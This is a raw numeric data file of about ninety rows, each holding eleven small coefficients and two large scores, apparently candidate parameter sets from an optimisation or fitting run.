[-8.29844666406642e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.849645416672899e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.714032924475303e-16, 2.492800478197597e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 190148608462.3534, 100180028793.61896]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06, -1.850709631603352e-08, 9.087619653117874e-10, 199924589208.46686, 100223589650.82378]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9654069739659012e-13, 4.855683396544643e-11, -1.461461940090847e-10, -1.803543054789903e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 178626169889.2221, 100558408593.70113]
[-8.332310924150067e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.8877585360256924e-11, -1.4675478300173032e-10, -1.8130493256774034e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 193351738763.71564, 100949387586.23102]
[-8.372802930516975e-10, -1.343853363763315e-12, -1.9192642832280474e-13, 4.852404641399239e-11, -1.446871529700577e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 197397120636.1133, 101220474756.86967]
[-2.081071620571536e-10, -1.3430194729908366e-12, -1.9531413192683389e-13, 4.8687777307168814e-11, -1.432701673757514e-10, -1.8195538935082505e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 189380748448.52612, 101440046940.05927]
[-8.372802930516975e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.815921924023075e-15, 8.834544584685654e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 198690577754.9655, 101467426817.57397]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, 4.8327983670281894e-11, -1.4675478300173032e-10, -1.8258864221284576e-15, 8.83613368865103e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8304452912365864e-08, 9.081976758127089e-10, 193392923341.53983, 101900620617.14302]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9719420123154376e-13, 4.861133464689211e-11, -1.483232636118454e-10, -1.8195538935082505e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.7966453439138136e-06, -1.836034443165441e-08, 9.087619653117874e-10, 174954502194.04602, 103131734300.077]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.814072294943091e-11, -1.437983579446461e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.107645094765291e-10, 171249412831.2997, 103180541968.40872]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.476291648179518e-10, -1.7906363569860738e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8221372696029056e-08, 9.081976758127089e-10, 154981149327.29538, 103805616436.34537]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.855683396544643e-11, -1.432701673757514e-10, -1.825643030416898e-15, 8.83613368865103e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.81828896229741e-08, 9.081976758127089e-10, 158250536108.31226, 106843736334.12831]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9439448414369486e-13, 4.855683396544643e-11, -1.4675478300173032e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.5187119035976227e-05, -1.797858272312416e-06, -1.836034443165441e-08, 9.087619653117874e-10, 148433419780.93826, 110030788135.34956]
[-8.372802930516975e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.799249889019179e-15, 8.765174154706532e-16, 2.4802576523291093e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.087619653117874e-10, 152744383578.88885, 111006224451.55664]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.83613368865103e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8140174569754755e-08, 9.081976758127089e-10, 140660582328.68314, 113087422800.04585]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.081976758127089e-10, 148227079557.4723, 115101067854.69138]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.830053261436748e-08, 9.081976758127089e-10, 129686832886.01216, 126984206927.84627]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.4592095499147362e-10, -1.7864100157215748e-15, 8.706272486016714e-16, 2.5177177276929545e-05, -1.7997194394724915e-06, -1.850709631603352e-08, 9.087619653117874e-10, 188127979624.47858, 98138013390.26245]
[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.8139505305916955e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.783887938075847e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.45816, 98829512345.71414]
[-8.379785124926609e-10, -1.3292316984383345e-12, -1.955394873972143e-13, 4.852404641399239e-11, -1.4779126633130978e-10, -1.799249889019179e-15, 8.775397316555329e-16, 2.5049204386853816e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 183972070969.05157, 98891303611.42876]
[-8.373750609204521e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.4659424506650604e-10, -1.7864100157215748e-15, 8.706272486016714e-16, 2.492800478197597e-05, -1.7997194394724915e-06, -1.836034443165441e-08, 9.087619653117874e-10, 176341783374.723, 99638222233.03885]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4696825367906723e-10, -1.799249889019179e-15, 8.705169785374419e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 187303786818.71506, 99962477826.90034]
[-8.29844666406642e-10, -1.3259182588069894e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.839563844754409e-16, 2.492800478197597e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 190148608462.3526, 100180028793.6191]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.839563844754409e-16, 2.4907384876305387e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 192885903228.52237, 100290100926.3771]
[-8.372802930516975e-10, -1.340114474894997e-12, -1.9475632661250835e-13, 4.852404641399239e-11, -1.4659424506650604e-10, -1.803543054789903e-15, 8.839563844754409e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 193159834117.98853, 100447140164.3877]
[-8.45347775440883e-10, -1.3359785407261977e-12, -1.9409478257397567e-13, 4.852404641399239e-11, -1.463585775827913e-10, -1.812045689500589e-15, 8.706272486016714e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 192907161589.0385, 100872818268.9527]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8130493256774034e-15, 8.705169785374419e-16, 2.4957985197946978e-05, -1.7997194394724915e-06, -1.836034443165441e-08, 9.087619653117874e-10, 183710210581.81177, 101076246798.6337]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.542150809952725e-05, -1.7997194394724915e-06, -1.850709631603352e-08, 9.087619653117874e-10, 168715457724.7375, 101683114493.3993]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.849645416672899e-11, -1.432701673757514e-10, -1.803543054789903e-15, 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06, -1.836034443165441e-08, 9.087619653117874e-10, 153789626574.96255, 105699410466.83022]
[-8.372802930516975e-10, -1.3398025228100945e-12, -1.9531413192683389e-13, 4.855683396544643e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.714032924475303e-16, 2.4957985197946978e-05, -1.793948394990656e-06, -1.836034443165441e-08, 9.081976758127089e-10, 159560429502.34207, 105861289429.36061]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.7864100157215748e-15, 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06, -1.836034443165441e-08, 9.087619653117874e-10, 147461834890.53723, 106068644665.40553]
[-8.372802930516975e-10, -1.3292316984383345e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4760843266911815e-10, -1.7864100157215748e-15, 8.706272486016714e-16, 2.492800478197597e-05, -1.7933608637070708e-06, -1.836034443165441e-08, 9.087979750822277e-10, 147793960453.4741, 109638154986.2024]
[-8.29844666406642e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.8434260838579935e-11, -1.4561659265574012e-10, -1.819718397269023e-15, 8.775397316555329e-16, 2.4948775411850268e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.081976758127089e-10, 150492287670.62976, 114344342719.97507]
[-8.406587076953522e-10, -1.318355348076889e-12, -1.9519777560623135e-13, 4.855683396544643e-11, -1.4760843266911815e-10, -1.815921924023075e-15, 8.839563844754409e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.081976758127089e-10, 148227079557.78632, 115101067854.31332]
[-8.389236670603421e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.717072130867646e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.087619653117874e-10, 137339476236.27339, 120797794814.05704]
[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.705169785374419e-16, 2.492800478197597e-05, -1.786297491730252e-06, -1.836034443165441e-08, 9.087619653117874e-10, 128365631923.39072, 133721716481.47603]
[-8.361552586353477e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.705169785374419e-16, 2.483403849637781e-05, -1.783565701728919e-06, -1.836034443165441e-08, 9.095300241628919e-10, 123047993752.2489, 147005409641.27127]
[-9.129396902499863e-10, -1.290047843436073e-12, -2.702634930634393e-13, 4.58556551164694e-11, -1.8724359625458014e-10, -2.1792166675464865e-15, 9.365717147446797e-16, 1.8994698205972217e-05, -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10, 169675879824.58978, 156722470654.13324]
[6.303262263534727e-10, -1.2096663849982051e-12, -2.5988950272728827e-13, 4.701662665204773e-11, -1.4934765549498044e-10, -2.0495920936053975e-15, 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10, 108072398467.48868, 167972224844.19583]
[6.303262263534727e-10, -1.2096663849982051e-12, -2.5988950272728827e-13, 4.701662665204773e-11, -1.4986345441105813e-10, -2.0495920936053975e-15, 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10, 108072398467.75635, 167972224843.92523]
[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15, 9.365717147446797e-16, 1.9540146753875297e-05, -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.03189, 192873830899.82352]
[6.303262263534727e-10, -1.290047843436073e-12, -2.5988950272728827e-13, 4.58556551164694e-11, -1.4986345441105813e-10, -2.1913589342035502e-15, 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10, 164354464752.25952, 160840990423.46024]
[6.354744988103506e-10, -1.2096663849982051e-12, -1.830526663998671e-13, 4.6589669053151376e-11, -1.4986345441105813e-10, -2.0495920936053975e-15, 8.502785255135087e-16, 1.894858193847651e-05, -1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10, 96467208837.94556, 179586543004.98117]
[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, 4.58556551164694e-11, -1.8580228849463816e-10, -2.1913589342035502e-15, 9.365717147446797e-16, 1.9540146753875297e-05, -1.8218396850604304e-06, -1.3360134446642706e-08, 8.759216763039946e-10, 117765020064.66293, 187118262382.8758]
[-9.129396902499863e-10, -1.3004166005044262e-12, -1.8356995493902235e-13, 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15, 9.365717147446797e-16, 1.962681376929987e-05, -1.8050933870374392e-06, -1.3418860642065019e-08, 8.693561802236366e-10, 122674650037.46736, 187415567631.77402]
[-9.212545260772544e-10, -1.2799153483071088e-12, -1.8213920664100724e-13, 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15, 9.365717147446797e-16, 1.9540146753875297e-05, -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.03189, 192873830899.82352]
[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, 4.6154548476823616e-11, -1.8724359625458014e-10, -2.1913589342035502e-15, 9.358479354640953e-16, 1.9540146753875297e-05, -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.02731, 192873830899.82806]
[2.2152115305769157e-10, -1.6907719215642795e-12, -2.5108769063589337e-13, 4.9793760275117476e-11, -2.0780774158604122e-10, -2.1593626664102876e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.77876424822685e-10, 170388218306.66492, 168925348515.4128]
[2.2152115305769157e-10, -1.6907719215642795e-12, -2.1051647732787472e-13, 4.9793760275117476e-11, -2.0780774158604122e-10, -2.1790706433018085e-15, 8.836470142939426e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.771058818345121e-10, 191821821495.1242, 158798904598.69617]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -2.1593626664102876e-15, 8.836470142939426e-16, 2.0217203662255432e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.771058818345121e-10, 177069079234.4985, 163375067226.8736]
[2.213664545134999e-10, -1.2059133330572482e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -2.1593626664102876e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.508245699810314e-08, 8.771058818345121e-10, 197879714583.27084, 152444791757.7255]
[0.0, -1.223723210207519e-12, -2.1051647732787472e-13, 4.971358693780409e-11, -1.7352085678160897e-10, -2.165433707987142e-15, 7.304553415989529e-16, 2.0047355685146273e-05, -1.7657604268720381e-06, -1.4977385439375226e-08, 8.771058818345121e-10, 197945074606.02325, 153164597685.87036]
[2.2152115305769157e-10, -1.1984578022968498e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 111986329581.05826, 155849166742.8801]
[2.2133713135172913e-10, -1.2059133330572482e-12, -2.5107145183244764e-13, 5.011120217163613e-11, -1.724660990140153e-10, -2.1790706433018085e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.771058818345121e-10, 187269085984.5673, 161472427331.15216]
[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11, -1.7677981323511262e-10, -2.145058695065051e-15, 7.430575474541962e-16, 2.0053347897812537e-05, -1.7639524821935923e-06, -1.4682044872577598e-08, 8.728626586100963e-10, 152433850624.54852, 175966043507.07343]
[0.0, -1.223723210207519e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -2.1790706433018085e-15, 7.430575474541962e-16, 1.9918519209106862e-05, -1.7685796144533914e-06, -1.4682044872577598e-08, 8.771058818345121e-10, 153535961138.3572, 184829802626.36642]
[2.2152115305769157e-10, -1.200937983572784e-12, -2.1065990049856794e-13, 5.011120217163613e-11, -1.7420072583381303e-10, -1.8426407940693324e-15, 7.454251311051652e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.508245699810314e-08, 8.771058818345121e-10, 92670242378.77588, 189416231139.84406]
[0.0, -1.2207456906260254e-12, -2.1065990049856794e-13, 4.9793760275117476e-11, -2.0772853669541976e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 1.9867416915370552e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.728626586100963e-10, 160631139543.06137, 122019730569.7476]
[2.2152115305769157e-10, -1.1984578022968498e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7677981323511262e-10, -1.857281675942834e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 153487531028.94116, 128597452665.91768]
[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 142632578694.80914, 130195065921.46504]
[2.2152115305769157e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, 161449199082.99103]
[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11, -1.7677981323511262e-10, -1.857281675942834e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.769936435419886e-06, -1.4682044872577598e-08, 8.728626586100963e-10, 100156348461.68698, 161778485371.36353]
[0.0, -1.1984578022968498e-12, -2.1065990049856794e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.760544278271184e-10, 100072993312.46272, 171303112707.4717]
[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 4.9793760275117476e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 8.836470142939426e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 97245352689.07887, 174341101475.58182]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.9675085987122204e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 92503635735.71886, 182996786041.40976]
[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11, -1.7677981323511262e-10, -2.1612081417375267e-15, 7.470344646267989e-16, 2.0053347897812537e-05, -1.7639524821935923e-06, -1.4645406166689473e-08, 8.730660207999707e-10, 148185335900.70355, 185221791801.95062]
[2.2111462065028517e-10, -1.2207456906260254e-12, -2.1065990049856794e-13, 5.056589741460715e-11, -1.7420072583381303e-10, -1.8426407940693324e-15, 7.454251311051652e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.508245699810314e-08, 8.771058818345121e-10, 92670242378.76936, 189416231139.85312]
[2.2152115305769157e-10, -1.2207456906260254e-12, -2.1065990049856794e-13, 5.011120217163613e-11, -1.7420072583381303e-10, -1.8276902524925885e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.771058818345121e-10, 90666406593.2125, 190153350507.14474]
[2.2152115305769157e-10, -1.2049195466583994e-12, -2.1065990049856794e-13, 4.98075339514226e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 7.454251311051652e-16, 2.0095046248399238e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.771058818345121e-10, 89706134652.28279, 197738317572.1617]
[0.0, -1.2031098015567e-12, -2.1065990049856794e-13, 5.0102593857564815e-11, -1.7352085678160897e-10, -1.819039898810471e-15, 7.460417812765263e-16, 2.0200374650352852e-05, -1.7758673160173464e-06, -1.5202351660972107e-08, 8.760544278271184e-10, 160476853944.9334, 119035825863.27417]
[2.2152115305769157e-10, -1.2031098015567e-12, -2.5161591646068603e-13, 4.9793760275117476e-11, -1.7849498396021264e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5344868185414675e-08, 8.771058818345121e-10, 180743589801.84604, 120144468135.82727]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.947687927376915e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.04140411384885e-05, -1.7639524821935923e-06, -1.5078308038358913e-08, 8.683463468773267e-10, 146622662638.346, 120359956158.03543]
[0.0, -1.1984578022968498e-12, -2.094909506024221e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.857281675942834e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7813149517985466e-06, -1.5091093694835327e-08, 8.760544278271184e-10, 171477577754.58575, 120995758664.39177]
[2.2152115305769157e-10, -1.1984578022968498e-12, -2.5108769063589337e-13, 4.9967768219433575e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.703632209100975e-10, 151029089477.88403, 121221447183.73479]
[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, 123962248783.03809]
[2.233355889138985e-10, -1.2031098015567e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 148301377250.4212, 129257349906.46594]
[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.448076765658434e-16, 2.0200374650352852e-05, -1.7728642137544318e-06, -1.517941226634992e-08, 8.771058818345121e-10, 131981382341.97574, 129372470770.49553]
[0.0, -1.2031098015567e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.82610373802557e-15, 8.836470142939426e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 142632578694.80914, 130195065921.46504]
[-5.2595470648843136e-09, -1.2003583976149596e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7461898455625076e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 142718091682.67987, 132029509845.4832]
[2.2257852388875064e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.9793760275117476e-11, -1.7380412465809723e-10, -1.841021101878205e-15, 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.750599822793858e-10, 126150709659.35735, 137741348069.72827]
[0.0, -1.2344709098355012e-12, -2.090479539659853e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.857281675942834e-15, 7.485411998460075e-16, 1.981538293869461e-05, -1.769936435419886e-06, -1.4682044872577598e-08, 8.711551918674385e-10, 114088676894.18327, 143862344272.2216]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 119621740814.33159, 143868003797.30536]
[2.2152115305769157e-10, -1.2003583976149596e-12, -2.088572649745598e-13, 4.995108013618423e-11, -1.7207960562590789e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.015341505664753e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 115848531243.76457, 151496866956.06183]
[7.878840270455085e-09, -1.2071709641632366e-12, -2.088572649745598e-13, 5.022894055850661e-11, -1.7352085678160897e-10, -1.8610445297760222e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.760544278271184e-10, 113456911424.16617, 154679332976.7693]
[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.760544278271184e-10, 107979663117.77498, 158587944243.3901]
[2.2152115305769157e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.451496753853957e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, 161449199082.99103]
[2.1977210438689425e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, 161449199082.99103]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.099781497267347e-13, 4.9793760275117476e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.0299458575301996e-05, -1.756844278469525e-06, -1.5202351660972107e-08, 8.750599822793858e-10, 101036412554.48618, 178952195751.12357]
[0.0, -1.2071709641632366e-12, -2.088572649745598e-13, 4.9793760275117476e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7587739009571313e-06, -1.5202351660972107e-08, 8.768692858683927e-10, 101115281125.52821, 181312381109.07834]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.9675085987122204e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 92503635735.71886, 182996786041.40976]
[2.2295275331941093e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.9675085987122204e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 92503635735.71886, 182996786041.40976]
[0.0, -1.223723210207519e-12, -2.1065990049856794e-13, 5.011120217163613e-11, -1.7707453284878416e-10, -1.866210682668369e-15, 7.430575474541962e-16, 1.9722774245768875e-05, -1.769936435419886e-06, -1.4682044872577598e-08, 8.760544278271184e-10, 88317753591.74515, 193403737351.61066]
[2.2152115305769157e-10, -1.2071709641632366e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7493239251088378e-06, -1.5085870105283375e-08, 8.701394499644777e-10, 90763281590.1167, 199093039398.6542]
[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.857281675942834e-15, 7.387655049943961e-16, 1.981538293869461e-05, -1.769936435419886e-06, -1.4563889985865401e-08, 8.644597543611974e-10, 157634872361.7637, 120593643708.66519]
[2.2257852388875064e-10, -1.2070230966272908e-12, -2.1051647732787472e-13, 5.027931250826744e-11, -1.755220169767042e-10, -1.810973414699955e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.750599822793858e-10, 159354716917.0895, 121269083493.68436]
[0.0, -1.2031098015567e-12, -2.090479539659853e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8577367523496564e-15, 7.430575474541962e-16, 1.9814643005749893e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.711551918674385e-10, 168378423128.42877, 121439949900.90005]
